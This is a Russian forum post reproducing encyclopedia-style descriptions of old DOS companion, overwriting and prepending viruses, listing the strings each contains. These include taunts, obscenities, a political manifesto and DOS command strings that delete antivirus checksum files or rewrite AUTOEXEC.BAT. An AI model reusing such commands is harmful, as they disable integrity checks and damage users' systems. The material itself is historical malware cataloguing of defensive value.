C:\DOS\SMARTDRV.DAT
C:\DOS\SMARTDRV.EXE
/C REN C:\DOS\SMARTDRV.EXE SMARTDRV.DAT
C:\DOS\SMARTDRV.EXE
*.exe
CHKLIST. MS
/C DEL CHKLIST.MS > NUL
CHKLIST.CP
/C DEL CHKLIST.CP > NUL
/C REN >NUL

HLLC.Cumulus
При заражении дописывает к своему телу имя заражаемого файла, дату и время заражения. В результате этого зараженные файлы содержат имена всех своих предков и даты, когда эти предки были заражены. Вирус содержит строки:

*.exe .com x.y Captain Cumulus travels .COM .EXE
C:\PCTOOLS C:\WP51 C:\ACAD C:\EXCEL C:\WP C:\DOS
©CaptainCumulusandSantaClaus-Finland

HLLC.Eagle.7705
Нерезидентный компаньон-вирус. Запакован утилитой Pklite, содержит в себе текст (также запакованный):

Portions Copyright © 1983,91 Borland & Eagle Performance Software

HLLC.Enrico
Заражает boot сектора флоппи-дисков вирусом "March6". Содержит строку:

© Enrico

HLLC.FLV.10217
Содержит строку:

Virus [Fired Love 10217] Version 1.0...! By L.S.Y.

HLLC.Globe.6610
Создает .COM-файлы с именами обнаруженных .EXE-файлов. Скомпилирован на Turbo-C и запакован утилитой DIET. Содержит тексты:

Turbo-C - Copyright © 1988 Borland Intl. Divide error
Abnormal program termination
Globe Virus V3.00
PATH *.EXE .COM .EXE

HLLC.Happy
Нерезидентные неопасные компаньон-вирусы. Ищут в текущем каталоге .EXE-файлы и создают для них файлы с теми же именами, но .COM-расширениями. Вирусы остаются резидентными, но не перехватывают ни одного 'вирусоопасного' прерывания, поэтому их следует считать нерезидентными. Вирусы семейства упакованы утилитами LZEXE и PKLITE. В октябре по понедельникам выводят текст:

HAVE A "HAPPY MONDAY" LANCSPOLY SUCKERS. POP WILL EAT ITSELF

и 'рожицы' (ASCII 1).

HLLC.Halley.7856
Нерезидентный вирус-компаньон, ищет .EXE-файлы и записывает себя в .COM-файлы с теми же именами. Содержит в себе строки:

HALLEY -virus v.1.0

Don`t panic, I`m the harmless one.
I just want to travel...
Have a nice day!

Скомпилирован на Turbo Pascal'е, строка-копирайт библиотеки компилятора затерта другим сообщением:

Shit happens... at
WANT TO TRAVEL!! I WANT TO TRAVELL!!

HLLC.IdoMoshe
Этот вирус создает файлы VIRDEMO.EXE в корневых каталогах всех доступных дисков. Затем вирус изменяет или создает файлы AUTOEXEC.BAT в корневых каталогах, вирус записывает в начало этих файлов команды:

Echo off
virdemo

Вирус выводит сообщение:

YOU HAVE A IDO & MOSHE NON HAZARD DEMO VIRUS
FOR CLEANING THIS VIRUS YOH MUST DELETE ALL VIRDEMO.EXE FILES
IN ALL ROOT DIRECTORIES IN ALL YOUR DISK

Также содержит строки:

:\Virdemo.exe :\virdemo.exe :\autoexec.bat virdemo Echo off

HLLC.Lanc
Резидентный компаньон-вирус. Скомпилирован на Турбо-Паскале. Содержит строки:

*.EXE .COM COMSPEC
>HAVE A "HAPPY MONDAY" LANCSPOLY SUCKERS. POP WILL EAT ITSELF

HLLC.Tpworm
Безобидный нерезидентный вирус. Ищет .EXE-файлы и создает .COM-файлы с теми же именами. Эти .COM-файлы содержат только тело вируса. Вирус скомпилирован на Microsoft C и содержит все текстовые строки, которые Microsoft C вставляет в файлы. Периодически стирает зараженный файл и сообщает:

Find me!

HLLC.Ultimation
Неопасный нерезидентный вирус. Ищет *.EXE-файлы, переименовывает их в "_*.EXE", а затем записывает себя вместо переименованных файлов. При запуске поражает первый незараженный EXE-файл, затем запускает на выполнение первоначальный файл. Откомпилирован на Turbo C, содержит в себе отладочный код и сообщения:

Turbo C++ - Copyright 1990 Borland Intl.
Null pointer assignment
Divide error
Abnormal program termination
PATH *.EXE copy NUL

Выводит одну из строк (случайно выбранную):

I'm bored.
Screw you.
Life is a drag.
kufc fof.
Ouch! Don't hit me so hard.
Floppy drive A: is flooded. Please insert J cloth.
Murderer.
You have been infected by ULTIMATION corp.
Go directly to jail. Do not pass go. Do not collect $200.
.Ah ha! Caught you.
Copy protection error 23. Please re-install from master.

HLLC.Aids.8064
Нерезидентный безобидный (?) компаньон-вирус. Если происходит запуск файла-двойника (т.е. файла-носителя вируса), для которого отсутствует исходный .EXE-файл, то вирус сообщает:

Your computer is infected with ...
Aids Virus II

- Signed WOP & PGT of DutchCrack -

Getting used to me ?
Next time, Use a Condom .....

HLLO.Aids
Написан на языке высокого уровня (видимо, Turbo-Pascal). Содержит текст:

This File Has Been Infected By AIDS! HaHa!

************************************************ *********************
* ATTENTION: *
* I have been elected to inform you that throughout your process of *
* collecting and executing files, you have accidentally ****** *
* yourself over; again, that's PHUCKED yourself over. No, it cannot *
* be; YES, it CAN be, a ***** has infected your system. Now what do *
* you have to say about that? HAHAHAHA. Have **** with this one and *
* remember, there is NO cure for *
* *
* ########## ############ ########### ########## *
* ###@@@@@@### @@@@##@@@@@@ ##@@@@@@@### ###@@@@@@@## *
* ##@@ ##@ ##@ ##@ ##@ ##@@ @@ *
* ##@ ##@ ##@ ##@ ##@ ##@ *
* ############@ ##@ ##@ ##@ ############ *
* ##@@@@@@@@##@ ##@ ##@ ##@ @@@@@@@@@##@ *
* ##@ ##@ ##@ ##@ ##@ ##@ *
* ##@ ##@ ##@ ##@ ###@ ## ###@ *
* ##@ ##@ ############ ###########@@ ##########@@ *
* @@ @@ @@@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@ *
* *
*********************************************** **********************

HLLO.Harakiri.5488
Очень опасный нерезидентный вирус, записывается вместо .COM- и .EXE-файлов. Зараженные файлы в результате этого не восстанавливаются и должны быть уничтожены. При заражении файлов выдает сообщения:

Ej Infekterad....!
Sdir =
Infecting file
File Already Infected
Program too big to fit in memory
Your PC is alive and infected with the HARAKIRI virus!

Также содержит строки:

*.*
*.exe
*.com

Вирус скомпилирован на Турбо-Паскале, в теле вируса можно найти текстовые строки компилятора.

HLLO.House.11636
Нерезидентный очень опасный вирус, поражает .EXE-файлы в текущем оглавлении, записывая свой код вместо заражаемых файлов. Старое содержимое файлов не сохраняется. Написан на языке C. Содержит в себе текст:

*.exe *HOUSEVIRUS* *.exe rb rb rb+

HLLO.Joker
При старте обходит каталоги дисков A: и C: и поражает в них не более 10 .EXE-файлов. После заражения файлов ищет .DBF-файлы и что-то записывает в них (укорачивает их?). Содержит строки: "C:\*.", "C: \", "C:\*.EXE", "\*.EXE", "C:\*.DBF", "\*.DBF", "A:\*.EXE", "A:\", "Runtime error at". Вместо запуска файла выдает одну из фраз:

Error in EXE file
File cannot be copied onto itself
Compare OK
Invalid Volume ID Format failure
Incorrect DOS version
Please put a new disk into drive A:
End of input file
END OF WORKTIME. TURN SYSTEM OFF!
Divide Overflow
Water detect in Co-processor
I am hungry! Insert HAMBURGER into drive A:
NO SMOKING, PLEASE! Thanks.
Don't beat me !!
Don't drink and drive.
Another cup of cofee ? OH, YES!
Can you fuck me ? Maybe ...
Coca-Cola is it !
What about ? Oh, yes. O.K. TODAY
Missing VGA! Call (209) 683-6858 !
Attention! Hard Disk is RADIOACTIVE!
I'm so much dirty! CLEAN ME!
Kiss my ... keyboard!
Hard Disk's head has been destroyed. Can you borow me your one?
Missing light magenta ribbon in printer!
In case mistake, call GHOST BUSTERS
Insert tractor toilet paper into printer.
Are you funny?
Keep smiling!
Warning! In drive A: are two diskettes.
Warning! Your mouse has some virus!
Disconnect your mouse, there are some cats!
I don't understand you. Can you repeat it?
West Lake Software and Data Research, WA 0108077, New Orleans, © 1986

HLLO.Kamikaze
Поражает .EXE-файлы в текущем оглавлении, содержит зашифрованную строку:

kamikaze

HLLO.Nova
Нерезидентен, поражает .EXE-файлы, содержит/выводит строки:

Finish demogroup NOVA 1994!
This program needs installation.
This is Dangerous Messanger, and here is my message to the world
Bad command or file name
Computer protected, no action.
Dangerous Messanger was here!
Can't initalize hardware... Try on another computer...
*.exe *.*

HLLO.NumOne
Очень опасные нерезидентные вирусы, записываются вместо .COM-файлов. При заражении выводят текст:

This file has been infected by Number One!
infected.

Скомпилированы на Turbo-Pascal'е и содержат все соответствующие строки:

Copyright © 1985 BORLAND Inc
Color display 80x25
Not enough memory$Incorrect DOS version$
Program aborted
User Break I/O Run-time error

"HLLO.NumOne.b" содержит текст:

Monochrome display

HLLO.Oscar
Очень опасный нерезидентный вирус, ищет *.COM- и *.EXE-файлы на дисках C:, D:, ... и записывается вместо них. Содержит тескт:

© by OSCAR

Вирус запакован, после распаковки появляются и другие строки:

General error reading drive
Abort, Retry, File?

© OSCAR. To dopiero pierwsze pozdrowienia dla S.Fischera i M.Sella.

Runtime error at .
Portions Copyright © 1983,90 Borland

HLLO.Picked.4505
Выводит сообщения:

Hey, horney, you shoulda used a CONDOM!!!
There are no EXE files in
You Have picked the file:

HLLO.Pu
Содержит строки:

Infected with radioactive Pu !
Beware for radiation

HLLO.Ruf
Содержит строки:

The 1993 RUW-virus has infected your system.
The damage has taken place . . . .
Directory has been removed from the system.
Bad command or file name

HLLO.Ruf
Содержит/выводит строки:

Packed file is corrupt(ed)
TU, 1994 product in TP v7.0

HLLO.Shadowgard
Нерезидентный очень опасный вирус, ищет .COM- и .EXE-файлы и записывается вместо них. После этого расшифровывает и выдает одно из сообщений:

Illegal copy
Insufficient memory
Network busy
Drive not ready

Откомпилирован на Pascal'e. Строка сообщения об ошибке "Runtime error" заменена на строку:

[Shadow-Gard] in
This is only DEMO version ! Prepare...

HLLP.7408
Создает TSR программу, которая совершает холостой цикл при каждом вызове INT 1Ch (timer) и INT 27h (KEEP).

HLLP.5792
Поражает только .EXE-файлы, выводит сообщения:

Error in *.EXE file
Pa,pa slodki bobasku ...

HLLP.6144
Содержит тексты, некоторые из них выводит на экран:

<*>-==> isDev -Copyright © 1066 ScumSoft- <==-<*>
disdev
DisDev
Portions Copyright © 1066 ScumSoft!!

HLLP.7529
Содержит тексты:

Insufficient DOS Version ... must be 3.2x or greater
Write Protect Error \ Disk Full ...
Error in file .EXE Abort.
PATH
Portions Copyright © 1983,90 Borland
IO sono STANCO ! va a dormire anche tu

HLLP.10460
Неопасный нерезидентный вирус, записывается в начало .COM-файлов текущего каталога. Откомпилирован на Turbo C++ и содержит все соответствующие строки-копирайты. При работе сообщает много полезной информации:

Работает антивирус 'ANTILINE' вируса 'LINE'
Лечу файл
Ошибка ! Ошибка !
Файл вылечен
Этот файл заражен вирусом 'LINE'.
Работаю...
Подождите пожалуйста, пока я заражу все файлы в этом дирректории.
Заражаю файл
Не могу закрыть файл
Файл заражен
Заражено файлов

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:40:09 | Сообщение # 41

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

(продолжение)

HLLP.15392
Выводит на экран довольно длинный текст:

M.S. Jurusalem Virus
This is a HARMLESS virus

Do not panick this is a Harmless Virus
<<< Press any key to continue >>

Do not worry this virus is designed to avoide making any damage to your
files. A free Virus remover will be send to computer Magazines:by then 30th
of oct 1992 So they can supply to coustomers. This is a demonstration of what
a Palestinian Boy can do. It is made by one of these Palestinians who are
suffering every day in their own homes because they don`t want to leave these
homes. It is the most unfair situation in the world, it is a crime which the
West has committed long time ago and still committing it until now under the
name of PEACE. Look at the Israelis, Western and Arabic governments. They are
criminals who talks about peace and freedom but they never allow them and
here are the Palestinians nation in Israel standing in their land fighting
for their own rights no matter what happens while U.S.A., Europe and some of
the Arabic nations supporting the Israelis to fight and finish this small
nation whom Jesus was one of them and after all this they call them selfs
Christians. It is Very easy to see this truth just wake up and remember that
one day you and your nationIare going to stand in front of the Creator of
this world to be judged on what you and your country did to the innocent
people. There is a lot a person can do to help a nation at least by
supporting this nation. It is very easy to such a virus to destroy your data
but this is not the manners of a good Palestinian. Our soul is light our
heart is white our mind is bright and we will always be the same no matter
what we go through. Signature: A Palestinian teenager. Sorry for interrupting
your work

HLLP.Animus
Нерезидентные вирусы. Ищут и записываются в начало .COM- и EXE-файлов. Содержат строки:

COMMAND.COM
Animus.id
Animus.exe
Portions Copyright © 1983,90 Borland

"HLLP.Animus.b" выводит на экран текст:

Give me CooKie? (use all Lower Case)
vanilla wafer
chocolate chip oreo hydrox

HLLP.Bdaagwa
Запакован неизвестным мне упаковщиком, распакованное тело вируса содержит строки:

Your PC is now BDаПGWA! (v1.2)
This program can not be executed because it is infected with a virus!

HLLP.Bishkek
"HLLP.Bishkek.4160" неопасен. Выводит сообщение:

"HLLP.Bishkek.4240" очень опасен - стирает boot-сектора дисков и выводит текст:

2Smokie3 virus,i zater tvoi sector,Ti ponal? Y/N

Также содержит строки:

HLLP.Dupalec
Неопасный нерезидентный вирус, ищет .COM- и .EXE-файлы и записывается в их начало. При поражении файлов вызывает как подпроцессы DOS'овские команды RENAME и DEL. Вирус содержит в себе тексты:

/C rename dupalec.exe
comspec
/C del dupalec.exe
dupacel.exe
/C rename dupa.exe
comspec
/C rename dupacel.exe
/C del
/C rename dupa.exe
protekt Cannot write .INI *.exe COMMAND.COM *.com NIEDZIALAJ

Pozdrowienia dla SZEFA!
Jak tam maТy Szmitek?
A teraz na powaзnie ( mam polskie znaki w standardzie Mazowii )
PROSZР NIE STRASZYХ DZIECI IN

Периодически выводит одну из фраз:

Przerwa obiadowa do 13:15
WyszТam za mЖз.Zaraz wracam.
Juз dawno po bajce!
ZgТodniaТem
Uwaзaj.W kuchni jest duch.
"Master of puppets" to stara dobra poezja Юpiewana
Czarny blues o 4-tej nad ranem?
ProszС nie straszyН dzieci informatyk

HLLP.Globe.5150
Безобидный нерезидентный вирус. Записывается в начало .COM- и .EXE-файлов. Скомпилирован на Turbo-Pascal'е и запакован утилитой LZEXE. Содержит текст:

HELLO!!!!! - GlobeVirus V3.00

HLLP.Halloween
Нерезидентный безобидный вирус, ищет и записывается в начало .COM- и .EXE-файлов. Содержит строки:

*.*
ALL GONE Happy Halloween
.COM .EXE
instal.exe /C instal.exe COMSPEC
*.COM *.EXE
savefrom.667
Runtime error at

HLLP.Legs
При заражении шифрует файлы. Содержит зашифрованную строку:

DEATH ON TWO LEGS Was Here

HLLP.Lomza
Нерезидентный очень опасный вирус. Ищет .COM- и .EXE-файлы в каталогах дисков A:, B:, C:, D: и записывается в их начало. В некоторые файлы записывает команду перехода не перезагрузку (JMP F000:FFF0). Написан на языке Turbo-Pascal.

HLLP.Nazi, HLLO.Nazi
"Nazi.4415" запакован. "Nazi.4240" записывается вместо файлов. Все вирусы семейства "Nazi" содержат в себе текст:

ON THE SABBATH.. THE GHOST OF HITLER SPEAKS :
"MY FELLOW NAZI'S.. I WAS WRONG.."
"I NOW COMMAND YOU TO COMMIT SUICIDE.. NOT GENOCIDE.."
"O IT.. SO THE WORLD WILL BE RID OF THE NAZIPEST..
"AND ALL AUSLANDER CAN TRUELY BE FREE OF NAZIPHOBIA..
NaZiPhobia © [VooDoo].. We support the message..
Portions Copyright © 1983,90 Borland

HLLP.NotFound
Выводит текст:

Borland Virus © 1994
Processor Intel PentiumTM not found.
17Gb disk free space not found.
512Mb extended memory not found.
16Mb XGA Video card not found.
Sound Blaster not found.
Sorry, your configuration doesn't match to run this...

HLLP.Rangel.5000
Содержит строку:

HLLP.Rsw.5846
Содержит (и выводит?) строки:

Я люблю пиво,компы и женщин By Rsw. Version 2.10
COMMAND.COM
VC.COM
CUT-REM.EXE
Блин , сегодня мой день рождения.
Я так рад , что не буду даже не чего зарожать ;-)
Copyright © 1994 by RSW
Release 17.06.94 , v. 2.10 (BugFix)
nortom.ini

HLLP.Sarka
Содержит (и выводит?) строки:

c:\working\zaloha
c:\working\zaloha\1.1
Dobry den pane jsem vr SARKA a ocitl jsem se spatky na vasem pocitaci.
*.exe *.WINDOWS
\work.exe
WARNING: DANGEROUS SUPER"IR S A R K A
Nazdaaaaaaar zdravy vas pocitacovy supervir S A R K A !
Pro zacatek bych mel pro vas nekolik uzitecnych rad: I
1. v pripade resetnuti pocitace nebo vypnuti vas pocitac okamzite
totalne zlikvyduji (neberte to jako vyhrusku)
2. tento vir je opravdu spicka proto zavirovane soubory nahravejte
svym pratelum a znamym at si tento vir taky vychutnaji
3. nahnete se bliz k pocitaci jsem totiz prenosny i na lidi
po precteni stisknete SPACE
! WARNING !
Opravdu sis myslel ze tvuj pocitac neznicim !
Tak to sis myslel spatne !!!!!!!
sacod.exe COMSPEC

HLLP.Sauron.4568
Содержит строки:

SAURON 4568
Wielkanocne pozdrowienia sklada Sauron

HLLP.Vova
Зашифрован, содержит строки:

© Dialogue, Rust. 1993
vir *.com *.exe COMMAND.COM NCMAIN.EXE EMM386.EXE NC.EXE
\VIR comspec /c ren v /c>nul copy/b \vir /c del
vir?
***ProfVovaVir 10.1 (INVECTOR),Give my best regards to LENA !!!
© 1992-94 by Vova of Ufa,11/03/94 (max. probability accident=1/128)***

HLLP.VVC.8304
Содержит (и выводит?) строки:

I'm sorry You hawe virus.
My name VVC 13 version 1.0 beta.
Special Thank's auhtor viruses Yeanke Doodle , Lozinsky D.N.
Virus by VVC & RSW release 25.02.94

HLLP.Zenit
Выводит картинку:

######## @@@@@ ###### #######
# ## @@@@@ ### ### ### ###
### @@@ ### ### ###
#### ################################# @@ ### ### ###
### ####### # # # # # ######## ########
####### ####### ####### # ### # ### ### ###
## # # # # #### # # ### ### ###
## ## ####### # # # # # ### ### ### ###
## ## ######## #######
## ###
### Санкт-Петербургский
Футбольный клуб "ЗЕНИТ"!

FAN CLUB 33
Лучше клуба нам не надо, чем ЗЕНИТ из Ленинграда
+------------------------------------- ---------------------------------+
| З Е Н И Т - F O R E V E R |
+---------------------------------------------- ------------------------+
Владимир Кулик, Игорь Данилов (футболист, а не вирусолог), Денис Зубко
Борис Матвеев, Сергей Дмитриев, ... , и, конечно же, П.Ф. Садырин

<END>

Настали суровые времена.
Связь: LEONeso@gmail.com

Сообщение отредактировал Battle - Четверг, 2006.02.16, 02:41:01

MeDVeD

Дата: Воскресенье, 2006.03.05, 16:11:50 | Сообщение # 42